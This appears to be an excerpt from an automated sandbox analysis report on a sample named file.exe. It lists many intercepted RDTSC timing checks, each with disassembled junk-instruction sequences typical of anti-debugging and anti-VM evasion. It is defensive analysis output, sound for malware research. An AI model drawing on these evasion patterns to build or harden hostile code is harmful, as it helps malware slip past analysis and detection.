          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5548 second address: AD554E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD554E second address: AD5554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5554 second address: AD5558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD56BB second address: AD56BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD56BF second address: AD56ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B19184AC5h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9A13 second address: AD9A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9A17 second address: AD9A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADAA50 second address: ADAA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9C3F second address: AD9C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9C46 second address: AD9C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FF6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADAB01 second address: ADAB25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F6B19184AB6h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADAB25 second address: ADAB29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADAB29 second address: ADAB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADAB2F second address: ADAB34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB10 second address: ADBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB14 second address: ADBB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB18 second address: ADBB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB1E second address: ADBB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADACD1 second address: ADACD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADADC3 second address: ADADCD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADADCD second address: ADADD2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCAE8 second address: ADCAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCAEC second address: ADCAF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCAF8 second address: ADCAFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDC16 second address: ADDC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6B19184AC7h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDC36 second address: ADDC3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BD2A second address: A8BD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3122 second address: AE312F instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B18E88FE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE47A7 second address: AE480C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F6B19184AB8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F6B19184AB8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 push 00000000h 0x00000044 sub dword ptr [ebp+1244F98Eh], edx 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDE02 second address: ADDE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FEBh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDE12 second address: ADDE90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr fs:[00000000h], esp 0x00000018 jng 00007F6B19184ACDh 0x0000001e mov eax, dword ptr [ebp+122D15A5h] 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F6B19184AB8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e push FFFFFFFFh 0x00000040 mov dword ptr [ebp+122D2772h], esi 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jne 00007F6B19184AB6h 0x00000050 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5845 second address: AE585E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B18E88FEEh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE585E second address: AE58DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F6B19184ABCh 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F6B19184AB8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F6B19184AB8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 cmc 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D350Eh], eax 0x00000050 push eax 0x00000051 pushad 0x00000052 jnl 00007F6B19184AB8h 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE58DC second address: AE58E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBCC6 second address: ADBCD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBCD6 second address: ADBCE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FEBh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE386F second address: AE3873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3873 second address: AE3879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4952 second address: AE4956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3879 second address: AE38A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B18E88FF0h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4956 second address: AE4A03 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F6B19184AB8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D2AA1h] 0x0000002e mov di, 31F4h 0x00000032 push dword ptr fs:[00000000h] 0x00000039 jmp 00007F6B19184AC5h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 call 00007F6B19184AC0h 0x0000004a mov edi, 328A9770h 0x0000004f pop edi 0x00000050 mov eax, dword ptr [ebp+122D1425h] 0x00000056 mov dword ptr [ebp+122D1900h], ebx 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007F6B19184AB8h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000017h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 mov dword ptr [ebp+1244F95Ch], edx 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4A03 second address: AE4A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4A07 second address: AE4A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDE13 second address: AEDE37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jnp 00007F6B18E88FECh 0x00000010 jno 00007F6B18E88FE6h 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED718 second address: AED740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABEh 0x00000007 jmp 00007F6B19184ABCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F6B19184AB6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED740 second address: AED787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B18E88FEBh 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e je 00007F6B18E88FE6h 0x00000014 jmp 00007F6B18E88FEBh 0x00000019 pop edx 0x0000001a jmp 00007F6B18E88FF9h 0x0000001f js 00007F6B18E88FF2h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED787 second address: AED78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2384 second address: AF238A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF238A second address: AF2390 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2390 second address: AF23D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F6B18E88FF7h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007F6B18E88FE6h 0x0000001b popad 0x0000001c jmp 00007F6B18E88FF1h 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF396B second address: AF3986 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6B19184ABCh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3986 second address: AF398B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3AD1 second address: AF3AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9B98 second address: AF9BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6B18E88FF2h 0x00000008 jne 00007F6B18E88FE6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9BBC second address: AF9BD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B19184ABEh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA11A second address: AFA123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA123 second address: AFA127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA247 second address: AFA256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 js 00007F6B18E88FE8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA256 second address: AFA25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA377 second address: AFA38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA38C second address: AFA3B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6B19184ABEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jl 00007F6B19184AB6h 0x00000014 popad 0x00000015 push eax 0x00000016 jnp 00007F6B19184ABCh 0x0000001c jc 00007F6B19184AB6h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA3B2 second address: AFA3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FF8h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA3CE second address: AFA3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA55F second address: AFA563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA6EA second address: AFA6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFAC2E second address: AFAC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFAC32 second address: AFAC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE338 second address: AFE341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03893 second address: B03899 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03899 second address: B038A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F6B18E88FE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B038A9 second address: B038AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03E66 second address: B03E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B18E88FEEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F6B18E88FEDh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03E8A second address: B03E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03E90 second address: B03E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03E96 second address: B03E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03E9C second address: B03EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03EA2 second address: B03EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1507 second address: AB150D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB150D second address: AB1515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1515 second address: AB151E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB151E second address: AB1523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1523 second address: AB1536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6B18E88FE6h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03364 second address: B03371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F6B19184ABEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0981F second address: B09832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F6B18E88FEEh 0x0000000b push edx 0x0000000c pop edx 0x0000000d jo 00007F6B18E88FE6h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDE24 second address: ACDE4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c jl 00007F6B19184AB8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDF9D second address: ACDFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDFA2 second address: ACDFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE275 second address: ACE279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE279 second address: ACE287 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE43E second address: ACE461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F6B18E88FE8h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE461 second address: ACE481 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6B19184ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 jbe 00007F6B19184AB6h 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE481 second address: ACE49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B18E88FF1h 0x00000011 rdtsc
